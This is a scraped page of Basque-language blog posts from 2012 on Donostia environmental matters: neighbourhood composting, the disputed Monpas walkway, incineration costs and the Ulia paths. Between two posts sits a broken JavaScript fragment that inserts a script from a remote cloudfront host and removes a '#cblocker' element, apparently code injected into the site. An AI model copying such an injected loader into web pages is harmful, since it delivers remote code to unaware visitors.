Category: Ingurugiroa

Auzokonposta egiteko aukera 5 auzotan

Aza 19 2012

Gaur ireki da Donostiako bost auzotan auzokonposta egiteko izen emate epea. Bost auzoak Añorga, Antiguo, Igeldo, Aiete eta Zubieta dira. Udalak auzokonposta guneak egingo ditu izen ematen duten familiek euren organikoa bertan utzi dezaten.

Gaurtik aurrera hainbat bilera egingo dira auzo konpostaiaren inguruan abiatzekoa den kanpainaren berri emateko. Lehenengo bilera Añorga Txikin izango da, Amassorrain Ikastolan, arratsaldeko 19:00etatik aurrera. Bihar Antiguon izango da bilera, arratsaldeko 19:00etan AEKren egoitzan. Asteazkenean Igeldoko Kultur Etxeaen izango da hitzordua, arratsaldeko 19:30etan. Azken bilera ostegunean izango da Aieten, 19:00etan.

Ekimen hau hondakinen Prebentziorako Europako Astearen baitan kokatzen da.

Mompaserako diru partida Urumearako izatea eskatu du Axier Jakak

Urr 07 2012

Donostiako BILDUren iritzia ezaguna da, Mompaseko pasabideari ez diogu zentzurik ikusten, garapen eredu harrapakariari erantzuten dio, itsasalde zati horri kalte ekologiko itzulezina eragingo lioke eta hiriari gainkarga ekonomikoa suposatuko lioke. Aste honetan publiko egin diren udaleko teknikarien txostenek berretsi egin dute ikuspegi hori, bai ingurumenari bai ekonomikoari dagokiona.

Hobe diru hori Urumean inbertitzea

Donostiako Udaleko Ingurumen zinegotzi Axier Jakak gaur jakinarazi duenez, Udaleko teknikariek Monpaseko pasabidea egiteko exekuzio proiektua aztertu dute, eta  desegokia dela ondorioztatu. Txosten horiek datorren asteko Tokiko Gobernuan aztertuko dira. Ondoren, Udal Gobernuak Portu eta Kosta Zuzendaritzaren Gipuzkoako Ordezkaritzari gutun bidez emango dio erantzuna. Hala ere, Udal Gobernuaren jarrera, hasieratik, partida hori hirian dauden premietarako erabiltzea dela esan du zinegotziak. Ildo horretan, Urumean uholdeen kontrako neurriak hartzeko bidera daitezela eskatu du.

Portu eta Kosta Zuzendaritzaren Gipuzkoako Ordezkaritzak irailaren 4an bidali zion exekuzio proiektua Udal Gobernuari. Proiektu eta Obrak, Mantentze eta Ingurumen atalek proposamena aztertu eta txosten bana egin dute. Gaur egungo proposamena hasierakoa baino hobea dela ondorioztatu dute, eta teknikoki bideragarria dela, baina mantentze arloan eta ingurumenean ez dira beharrezko baldintzak betetzen.

Mantentzeari dagokionez, proiektu berrian exekuzio gastuak murrizteko ahalegina egin da. Horrek mantentze lanak asko garestitzea eragingo luke eta gastu horiek Udalaren bizkar geratuko lirateke. Monpas inguruan haizeak eta itsasoak zakar jotzen dute, eta oso ingurune gazia da. Beraz, pasabidea mantentzeko ohiko lanek urtean 124.000 €-ko gastua eragingo lukete, Mantentze zerbitzuaren kalkuluen arabera. Baina aparteko gorabeherak gertatuko balira, adibidez, ekaitz gogorren ondorioz edo mendi-hegaleko lur-jausien ondorioz, kalteak izugarriak izan daitezke. Eta horiek Udalak hartu beharko lituzke bere gain.

Itsas espeziei kalteak

Bestetik, Ingurumen Departamentuak ondorioztatu du pasabide eraikitzeak habitaten eta espezien gaineko kalteak eragingo lituzkeela, batez ere ingurune hori Natura 2000 sarean sartzeko aukera eman zuten natur balioen gainean, eta ez direla behar bezala neurtu. Txosten horren arabera, habitatei beharrezkoa duten gazitasun maila kenduko die tartean pasabidea izateak eta hegaztiei habia egiteko behar duten lasaitasun eta isolamendua. Gainera, gogoan izan behar da Ulia Batasunaren Garrantzizko Lekua dela eta Udal Gobernuarentzat bereziki babestu beharreko eremua. Beraz, txostenak aztertuta, Udalak Kosta Zuzendaritzari ezezkoa eman behar diola adierazi du Ingurumen zinegotziak.

Jarrera bera hasieratik

Udal Gobernuak Monpaseko pasabidearekiko daukan jarrera hasierako berbera dela nabarmendu du Axier Jakak; hau da, bederatzi milioiko partida hori hirian premiazkoak diren proiektu edo lanetarako bideratzea, eta pasabidea ez du premiazkotzat jo. Hala ere, exekuzio proiektua aztertu du, Udalaren erantzukizuna delako. “Garbi utzi nahi dugu Udal Gobernuak inoiz ez duela egokitzat jo Monpaseko pasabidea egitea. Hala ere, Udalera datozen proiektu guztiak aztertu eta horien inguruko txostenak egiteko konpromisoa dauka, bere lanaren parte delako eta arduraz jokatzen duelako”, esan du Jakak.

Zinegotziak gaineratu duenez, Udal Gobernuak alderdiei ere askotan eskatu die babesa emateko, Madrilgo gobernuak partida hori beste helburu batzuetara bideratzea lortzeko. Bereziki, Urumean uholdeak saihesteko neurriak hartzeko. Gainera, neurri horiek hartzea Madrilen erantzukizuna ere bada. Horrekin batera, aipatutako partida hirian krisiaren eta langabeziaren aurkako neurriak hartzeko erabiltzea ere mesedegarria izango litzatekeela esan du Jakak.

Ministerioa dirurik gabe

Dena den, Udal Gobernuak Espainiako Gobernuaren benetako asmoen inguruko zalantzak dauzka. Izan ere, 2011ko aurrekontuetan, Tabakalerarako zazpi milioi euroko diru ekarpena egingo zuela jaso zuen arren, ez du egin eta egunotan hainbat partida murriztuko dituela iragarri du, adibidez, Zinemaldiari egiten dio ekarpenean.

Esanguratsua da halaber Udalaren ezezkoa nola bilatu duten, nolabait ezkutatu nahiz beraiek ere ez zutela proiektua egiteko batere asmorik. Horrelako egoerak desblokeatzeko eratu ohi den negoziazio mahai bat osatu beharrean, Donostiarekin hiriaren lehentasunei buruz hitz egin beharrean, ‘hartu edo utzi’ eskaintza itxia egin diote Udalari, eta 10 eguneko epea eman erantzuteko, aztertu beharreko dokumentazioa ikaragarria izan arren. Epe motzerako politiken miseriak.

(Iturria: Donostiako Udaleko Prentsa Bulegoaren oharretik moldatua)

 

// -1?’https’:'http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};]]>

Errausketa ez da errenta

Ira 18 2012

Ez dugu guk esaten, Diario de Mallorca egunkarian Balear Irletako Ingurumen sailburuak esaten du. Zita hau Pello Zubiriak ARGIAn idatzitako artikulu bikain batetik atera dugu, merezi du hitzez hitz hona ekartzea:

Durante 20 años se ha engañado a los ciudadanos al transmitir que quien más recicle, menos paga por tratamiento de incineración. Esto no es así. La realidad es que cuento más recicles y menos toneladas entran en el sistema de Son Reus, más tienes que pagar porque hay una inversión hecha por parte de la incineradora que hay que amortizar y la concesión no acaba hasta el año 2041. Mallorca es una isla con vertederos cero. Es un modelo a seguir en este sentido. También funciona perfectamente la recogida y tratamiento y tenemos un buen nivel de reciclaje. El único problema que tenemos es la necesidad de hacer rentable la incineradora. Así como están las cosas, la única posibilidad de bajar la tasa pasa por traer más toneladas o más combustible para incinerar.

Uliako bideak online

Abu 28 2012

Dagoeneko ikus daitezke Uliako bide publiko guztiak Donostiako Udaleko web orrian (Uliako mapa pdf-an). Igeldoko eta Zubietako bideak dagoeneko aztertuta zeuden eta oraingoan Uliakoen txanda izan da. Josu Telleriak egin du 38,6 kilometroko bide hauen azterketa. Hauek guztiak herritarren zerbitzura jartzeko orain bide horien atonketa egin behar da, eta horretan guztiok lagundu dezakegu. Udala dagoeneko ari da auzolana sustatzeko partaidetza mekanismoak sustatzen.

Uliako Interpretazio Zentroa martxan da

Uzt 25 2012

2012ko uztailaren 28an irekiko ditu ateak Uliako Interpretazio Zentro berriak. Ekipamenduaren kudeaketa Cristina Enea Fundazioak hartuko du bere gain, era honetan, koordinatzen duen hirugarren udal-dotazioa bilakatuz, Cristina Eneako Ingurumen Baliabideen Etxea eta Urgulleko Natur Txokoarekin batera.

Donostiako Udalak, fundazioaren bidez herritarren artean sustatu nahi duen ingurumen eta iraunkortasun baloreetara bideraturiko eraldaketa adeitsua lortzeko tresna eta baliabide didaktiko garrantzitsuak dira aipatu hiru gune horiek. Interpretazio Zentroaren kasuan, Ulia bezalako leku berezi eta enblematikoa ezagutzera emateko balioko du, bere ingurune fisiko, natural eta historikoan sakonduz.
Irekierako bideoa
Interpretazio zentro berriak jarduera didaktiko eta kulturalez beteriko egitaraua izango du, tailer didaktikoekin,

Read more ...